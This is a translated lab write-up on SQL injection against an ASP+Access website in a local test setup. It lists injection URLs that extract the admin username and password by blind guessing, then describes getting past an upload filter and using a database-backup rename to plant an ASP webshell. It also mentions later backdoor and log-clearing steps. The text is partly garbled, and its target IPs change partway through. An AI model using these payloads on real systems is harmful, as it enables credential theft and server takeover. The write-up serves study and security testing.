Lab 11: asp+access Case of SQL injection

For learning reference only, study and record 2013.5.8 day

Qianjiang Aquatic Case
(SQL injection asp+access)
Experimental purpose by injecting vulnerability upload config.asp
The experimental process is as follows:
Experimental premise: To build IIS on the server
Start the experiment.
Upload the compiled web to the server by sharing it, then unzip the Qianjiang aquatic packet.
File, then import the packet into C:\inetpub\wwwroot, and then open it via command line inetmgr
Set up the default Web site, and then specify the path of the Qianjiang aquatic in the default Web site under the home directory, then enable the parent path in the settings in the configuration, add index.asp to the guide, and then start the ASP in the network extension
Web server when everything is ready, visit the client on the Qianjiang aquatic server
Now we're going to use a simple, programmatic query to infer if the site has an injection vulnerability.
After visiting the website, enter: http:\192.168.2.4 in the Address bar, then find a Wuhan aquatic expert in the webpage,
When the address appears: Http://192.168.2.4/shownews.asp? Id=41, this is a typical injection vulnerability
We can use the following can be seen in the shownews.asp to see if there is "Wuhan aquatic experts", found that this news page is saved in the database
Now let's look in the database for "select"
Here is a Web page to build Qianjiang aquatic products

Http://192.168.2.4/shownews.asp? id=41 Query OK

There are three ways we can determine if there is an injection vulnerability.
1.http://192.168.2.4/shownews.asp? Id=41 ' query is not normal

2.http://192.168.2.4/shownews.asp? id=41 and 1=1 query ok

3.http://192.168.2.4/shownews.asp? id=41 and 1=2 query not normal

4.http://192.168.2.4/shownews.asp? id=41 and select Username,password from user query error

5.http://192.168.2.4/shownews.asp? Id=41 and 0<> (select COUNT (*) from admin) normal access

6.http://192.168.2.4/shownews.asp? Id=41 and 0<> (select COUNT (*) from admin1) not properly accessed

7.http://192.168.2.4/shownews.asp? Id=41 and 0<> (select count (user) from admin) query ok

8.http://192.168.2.4/shownews.asp? Id=41 and 0<> (select count (password) from admin)

9.http://192.168.2.4/shownews.asp? Id=41 and (select top 1 len (user) from admin) >0 Normal

10.http://192.168.2.4/shownews.asp? Id=41 and (select top 1 len (user) from admin) >1 Normal

11.http://192.168.2.4/shownews.asp? Id=41 and (select top 1 len (user) from admin) >2 Normal, know that the error is that number, such an attempt, until an error occurs. Then the length of the password is the number of the error, the next is to guess the password

12.http://192.168.1.10/shownews.asp? Id=41 and (select top 1 ASC (Mid (user,1,1)) from Admin) >0 error occurred

13.http://192.168.1.10/shownews.asp? Id=41 and (select top 1 ASC (Mid (username,1,1)) from admin) >0 Normal

14.http://192.168.1.10/shownews.asp? Id=41 and (select top 1 len (username) from admin) >1

15.http://192.168.1.10/shownews.asp? Id=41 and (select top 1 len (username) from admin) >2 just before the problem, and now again to guess again, until the error is guessed, then the length of the password is the number of errors

16.http://192.168.1.10/shownews.asp? Id=41 and (select top 1 ASC (Mid (username,1,1)) from admin) >0 now guess the administrator's account

Here's a step-by-step process of cracking passwords with little Aoi.

17.http://192.168.2.4/shownews.asp? Id=41 and (select top 1 len (password) from admin) >0 now guess the length of the password

18.http://192.168.1.10/shownews.asp? Id=41 and (select top 1 ASC (Mid (password,1,1)) from admin) >0 guess what the password is now.

Here's a step-by-step hack password with little Aoi.

Now the administrator's account has been identified, the administrator's password also guessed out
And then we're going to start injecting.
Find "Site management" below the Qianjiang aquatic network, then enter the administrator's account number and password to access the backend directly
Then find the editor page of the news, in here to find the Insert picture, you can use this loophole to upload pictures, also put config.asp this file, but here the file only JPG,GPF, then you will
Back to the client, change the suffix of config.asp to gpf or JPG,
Then find the place where this file is stored, enter this address in the address bar of the client, and find that it cannot be accessed
Then find the upload file in System Management, then find the database backup, then back up the files and find the path of the backup
Then save the path of the picture in the current database, and then change the name of the saved database to the suffix name,
Then copy this address and enter the path to the confi.asp file in the address bar

Here you need to fill in the contents, and then upload, and then find the path address after the upload

Below you can upload a file step-by-step through config.asp, then right, then Telnet, then do the backdoor, and then clear the log and so a series of operations, here I do not demonstrate

Summary: For learning reference only, Data from 2013.5.8 to learn to organize, do not do illegal taboo things, offenders wrongful, I just provide a learning platform, only for the study of reference, I hope you take this as the company's security protection to do vulnerability testing, do not use to infringe other's property or economic loss and personal privacy security leakage of things, offenders, note that this is only is for learning reference use, do not do illegal things

Lab 11: asp+access Case of SQL injection